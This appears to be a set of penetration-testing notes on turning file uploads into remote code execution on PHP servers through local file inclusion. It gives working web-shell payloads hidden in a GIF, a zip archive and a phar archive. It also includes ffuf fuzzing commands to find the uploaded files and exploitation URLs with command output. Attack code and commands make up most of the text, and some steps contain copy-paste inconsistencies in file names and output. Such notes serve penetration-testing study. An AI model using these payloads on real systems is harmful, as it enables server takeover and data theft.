FILE UPLOADS
Last updated
Last updated
the main focus here isn't on the exploitation of file upload forms and functionalities, as the methods here doesn't require the file upload form to be vulnerable. the main concern is merely on the ability to upload ANY files through file inclusion functionality (e.g., images on a profiles page). if the vulnerable function has code Execute capabilities, then the code within the file uploaded by attackers will get executed, regardless of the file extension or file type.
this method will work as long as the vulnerable function allows code execution.
#step 1: create a malicious image containing a PHP web shell code that still looks and works as an image
root@oco:~$ echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif
* this must be an allowed image extension and must also include the image magic bytes at the beginning of the file content
- this is a requirement in case the upload form checks for both the extension and content type
- to utilize other image extensions that have magic bytes in binary, URL encoding is required
* this file on its own is completely harmless and would not affect normal web applications
- the impact is realized when this payload is combined with an LFI vulnerability to reach remote code execution.
#step 2: upload
root@oco:~$ BROWSER > http://<SERVER_IP>:<PORT>/settings.php
upload: {upload image}
#step 3: identify file path where the image was uploaded
root@oco:~$ BROWSER > http://<SERVER_IP>:<PORT>/settings.php > CTRL+U
...
<img src="/profile_images/shell.gif" class="profile-image" id="profile-image">
...
* perform a source code review to identify the file path; else use fuzzing
#step 3 (alternative): fuzz for file path or extension
root@oco:~$ nano fuzznfind.txt
shell
root@oco:~$ ffuf -w fuzznfind.txt -u http://{targetSite:port}/profile_images/FUZZ -recursion -recursion-depth 1 -e .gif -v -ic -t 100
* the -recursion flag enables recursive scanning
* the -recursion-depth flag specifies the depth of the recursive scan
- this cmd specifically fuzzes the main directories and their subdirectories
* the -e flag specifies the extension
* the -v flag signifies verbose which outputs the full URL
* the -ic flag removes wordlist comments
* fuzz for an uploads directory, and then fuzz for the uploaded file
- this combines the directory fuzzing with page fuzzing
- NOTE: this may not always work as some web applications properly hides uploaded files.
#exploitation
root@oco:~$ BROWSER > http://<SERVER_IP>:<PORT>/index.php?language=./profile_images/shell.gif&cmd=id
GIF8uid=33(www-data) gid=33(www-data) groups=33(www-data)
* NOTE: the ./profile_images/ path is included in the URL as its where the payload is stored.
In cases where the webapp prefixes a directory before the input, simply use the ../
to move out of the prefixed directory and include the payload URL paththis method is often used when image uploads technique doesn't work. However, the zip wrapper isn't enabled by default and may not always work
#step 1: create a malicious PHP web shell code
root@oco:~$ echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php
* this saves the php cmd shell as 'shell.php' which is then zipped as 'shell.jpg'
* Even though the zip archive is named as (shell.jpg), some upload forms may still
detect the file as a zip archive through content-type tests and disallow its
upload, so this attack has a higher chance of working if the upload of zip
archives is allowed.
#step 2: upload
root@oco:~$ BROWSER > http://<SERVER_IP>:<PORT>/settings.php
upload: {upload image}
#step 3: identify file path where the image was uploaded
root@oco:~$ BROWSER > http://<SERVER_IP>:<PORT>/settings.php > CTRL+U
...
<img src="/profile_images/shell.gif" class="profile-image" id="profile-image">
...
* perform a source code review to identify the file path; else use fuzzing
#step 3 (alternative): fuzz for file path or extension
root@oco:~$ nano fuzznfind.txt
shell2
root@oco:~$ ffuf -w fuzznfind2.txt -u http://{targetSite:port}/profile_images/FUZZ -recursion -recursion-depth 1 -e .jpg -v -ic -t 100
* the -recursion flag enables recursive scanning
* the -recursion-depth flag specifies the depth of the recursive scan
- this cmd specifically fuzzes the main directories and their subdirectories
* the -e flag specifies the extension
* the -v flag signifies verbose which outputs the full URL
* the -ic flag removes wordlist comments
* fuzz for an uploads directory, and then fuzz for the uploaded file
- this combines the directory fuzzing with page fuzzing
- NOTE: this may not always work as some web applications properly hides uploaded files.
#exploitation
root@oco:~$ BROWSER > http://{targetSite:port}/index.php?language=zip://./profile_images/shell2.jpg%23shell2.php&cmd=id
GIF8uid=33(www-data) gid=33(www-data) groups=33(www-data)
* NOTE: the ./profile_images/ path is included in the URL as its where the payload is stored.
In cases where the webapp prefixes a directory before the input, simply use the ../
to move out of the prefixed directory and include the payload URL paththis method is similar to the previous ones, but uses the phar:// wrapper instead
#step 1: create a malicious PHP web shell code
root@oco:~$ nano shell3.php
<?php
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>');
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->stopBuffering();
?>
#compile the script into a phar file that when called would write a web shell to a shell.txt sub-file
root@oco:~$ php --define phar.readonly=0 shell3.php
* this creates an output named shell.phar
root@oco:~$ mv shell.phar shell3.jpg
#step 2: upload
root@oco:~$ BROWSER > http://<SERVER_IP>:<PORT>/settings.php
upload: {upload image}
#step 3: identify file path where the image was uploaded
root@oco:~$ BROWSER > http://<SERVER_IP>:<PORT>/settings.php > CTRL+U
...
<img src="/profile_images/shell.gif" class="profile-image" id="profile-image">
...
* perform a source code review to identify the file path; else use fuzzing
#step 3 (alternative): fuzz for file path or extension
root@oco:~$ nano fuzznfind.txt
shell3
root@oco:~$ ffuf -w fuzznfind.txt -u http://{targetSite:port}/profile_images/FUZZ -recursion -recursion-depth 1 -e .jpg -v -ic -t 100
* the -recursion flag enables recursive scanning
* the -recursion-depth flag specifies the depth of the recursive scan
- this cmd specifically fuzzes the main directories and their subdirectories
* the -e flag specifies the extension
* the -v flag signifies verbose which outputs the full URL
* the -ic flag removes wordlist comments
* fuzz for an uploads directory, and then fuzz for the uploaded file
- this combines the directory fuzzing with page fuzzing
- NOTE: this may not always work as some web applications properly hides uploaded files.
#exploitation
root@oco:~$ BROWSER > http://<SERVER_IP>:<PORT>/index.php?language=phar://./profile_images/shell3.jpg%2Fshell.txt&cmd=id
GIF8uid=33(www-data) gid=33(www-data) groups=33(www-data)
* use the phar:// wrapper and provide the url path then specify the phar sub-file with /shell.txt (URL encoded) to get the output of the command
* NOTE: the ./profile_images/ path is included in the URL as its where the payload is stored.
In cases where the webapp prefixes a directory before the input, simply use the ../
to move out of the prefixed directory and include the payload URL path